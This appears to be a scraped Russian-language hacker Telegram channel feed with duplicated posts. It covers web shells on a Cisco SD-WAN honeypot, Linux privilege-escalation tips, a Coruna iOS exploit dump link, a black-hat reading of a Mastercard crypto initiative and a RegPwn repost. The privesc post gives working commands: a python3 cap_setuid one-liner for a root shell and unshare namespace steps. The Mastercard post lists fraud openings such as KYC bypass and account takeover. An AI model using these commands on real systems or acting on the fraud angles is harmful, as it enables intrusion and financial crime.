UPD to https://t.me/proxy_bar/3185 CVE-2026-20127
*
В Cisco SD-WAN honeypot начали массово прилетать веб-шеллы.
Маховичок крутится.
*
В Cisco SD-WAN honeypot начали массово прилетать веб-шеллы.
Маховичок крутится.
👍13
Рубрика На заметку
*
*
Linux давно ушёл от модели root / non-root. Все равны, но кто то р@вн33 ) Появились
Отдельные привилегии , дающие значок шерифа (например меняя UID).
Проверка capabilities:
опасные capabilities:
CAP_SYS_PTRACE # читать память процессов
CAP_SYS_ADMIN # почти root
CAP_DAC_OVERRIDE # игнорить права файлов
CAP_NET_ADMIN # рулить сетью
CAP_SETUID # менять UID
Кстати иногда админы отдают
*
*
Namespaces Abuse
Вообще namespaces изолируют ресурсы:
Namespacы дают получить root в изолированной среде и затем сразу же атаковать ядро.
А уж внутри....... можно маунтить filesystem, юзать overlayfs, девайсы создавать. Во многих
То есть можно:
И смонтировать overlay =
Вообще NS поле не паханное, которое вываливается за горизонт событий, а если еще и misconf рядом есть, ну это ключи of kingdo0m
#РубрикаНаЗаметкуХакеру
$USERNAME@hacker.wtf - part 8*
*
Linux давно ушёл от модели root / non-root. Все равны, но кто то р@вн33 ) Появились
Capabilities !Отдельные привилегии , дающие значок шерифа (например меняя UID).
Проверка capabilities:
getcap -r / 2>/dev/null
# и если например:
/usr/bin/python3 = cap_setuid+ep
# то бинарь может менять UID, значит сразу можно забрать root shell
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
опасные capabilities:
CAP_SYS_PTRACE # читать память процессов
CAP_SYS_ADMIN # почти root
CAP_DAC_OVERRIDE # игнорить права файлов
CAP_NET_ADMIN # рулить сетью
CAP_SETUID # менять UID
Кстати иногда админы отдают
capability вместо SUID, это ниразу не секурнее, это ТОТ ЖЕ PrivEsc.*
*
Namespaces Abuse
Вообще namespaces изолируют ресурсы:
PID, NET, MNT, USER, UTS, IPC. И если словить мисконф или научиться солить, то можно в PrivEsc.Namespacы дают получить root в изолированной среде и затем сразу же атаковать ядро.
#Чекаем, можно ли вообще трюкачить в user namespace
cat /proc/sys/kernel/unprivileged_userns_clone
1 = $USER может создать namespace
#cоздаём namespace (где -r root внутри namespace, -m новый mount namespace)
unshare -r -m bash
id
uid=0(root)
А уж внутри....... можно маунтить filesystem, юзать overlayfs, девайсы создавать. Во многих
kernel privilege escalation присутствует.То есть можно:
mkdir lower upper work merged
И смонтировать overlay =
OverlayFS/FUSE/kernel permission bypassВообще NS поле не паханное, которое вываливается за горизонт событий, а если еще и misconf рядом есть, ну это ключи of kingdo0m
#РубрикаНаЗаметкуХакеру
🔥14👍12
Внутри Coruna: реверс-инжиниринг государственного набора эксплойтов для iOS from JavaScript
*
Research
*
DownLoad Coruna DUMP
*
Research
*
DownLoad Coruna DUMP
🔥16😱9
УУУУ жир
Mastercard запускает новую блокчейн-инициативу для мгновенных международных переводов, к которой подключились Binance, PayPal и Ripple и тд.
Идея простая: объединить ликвидность криптобирж, огромную аудиторию PayPal и технологию трансграничных расчётов Ripple, чтобы отправлять бабки почти мгновенно ииии за свой <1% (ну разумеется).
*
А чьто для черных шляп ?
Появление более жирной и дорогой поверхности атаки !
Ведь в крипто партнерке 85 + компаний и у каждой свои рельсы, API, SDK, провайдеры ликвидности, compliance-подрядчиков и интеграционных сценариев, бизнес логики ичтотамеще.
А чем больше интеграций, тем больше ошибок в логике, правах доступа, webhook/API-цепочках и обработке исключений.
Все потому что у Mastercard Crypto Credential упор на верифицированные идентификаторы\проверку поддерживаемых активов, governance framework и вот это вот все.
Поэтому и становятся ценными - обход KYC/KYB, захват аккаунтов, подмена бенефициара, соц engineering вокруг “алиасов”, abuse возвратов/чарджбеков и попытки проскочить без мыла между булок разных юрисдикций.
А еще будет санкционный/географический арбитраж !
Белые шапки конечно тоже заработают, только меньше.
И сам блокчейн тут не главная история.Кулл стори тут это конвертация криптоИнфры в массовый платёжный контур.
Mastercard запускает новую блокчейн-инициативу для мгновенных международных переводов, к которой подключились Binance, PayPal и Ripple и тд.
Идея простая: объединить ликвидность криптобирж, огромную аудиторию PayPal и технологию трансграничных расчётов Ripple, чтобы отправлять бабки почти мгновенно ииии за свой <1% (ну разумеется).
*
А чьто для черных шляп ?
Появление более жирной и дорогой поверхности атаки !
Ведь в крипто партнерке 85 + компаний и у каждой свои рельсы, API, SDK, провайдеры ликвидности, compliance-подрядчиков и интеграционных сценариев, бизнес логики ичтотамеще.
Supply-chain во все поля.А чем больше интеграций, тем больше ошибок в логике, правах доступа, webhook/API-цепочках и обработке исключений.
Технические взломы отваливают на второй план - а гибридный fraud-abuse впереди. Все потому что у Mastercard Crypto Credential упор на верифицированные идентификаторы\проверку поддерживаемых активов, governance framework и вот это вот все.
Поэтому и становятся ценными - обход KYC/KYB, захват аккаунтов, подмена бенефициара, соц engineering вокруг “алиасов”, abuse возвратов/чарджбеков и попытки проскочить без мыла между булок разных юрисдикций.
А еще будет санкционный/географический арбитраж !
Белые шапки конечно тоже заработают, только меньше.
И сам блокчейн тут не главная история.Кулл стори тут это конвертация криптоИнфры в массовый платёжный контур.
👍36😱9
RIP RegPwn: The Rise and Fall of a Windows Registry Exploitation Technique
Original text by Filip Dragovic.
As part of MDSec’s R&D work, we often discover vulnerabilities and develop exploits to support our red team engagements. When researching widely used software, it is often only a matter of time before the same vulnerability is discovered by other researchers and reported to the vendor. Two weeks ago we…
https://core-jmp.org/2026/03/rip-regpwn-the-rise-and-fall-of-a-windows-registry-exploitation-technique/
Original text by Filip Dragovic.
As part of MDSec’s R&D work, we often discover vulnerabilities and develop exploits to support our red team engagements. When researching widely used software, it is often only a matter of time before the same vulnerability is discovered by other researchers and reported to the vendor. Two weeks ago we…
https://core-jmp.org/2026/03/rip-regpwn-the-rise-and-fall-of-a-windows-registry-exploitation-technique/
👍12🔥6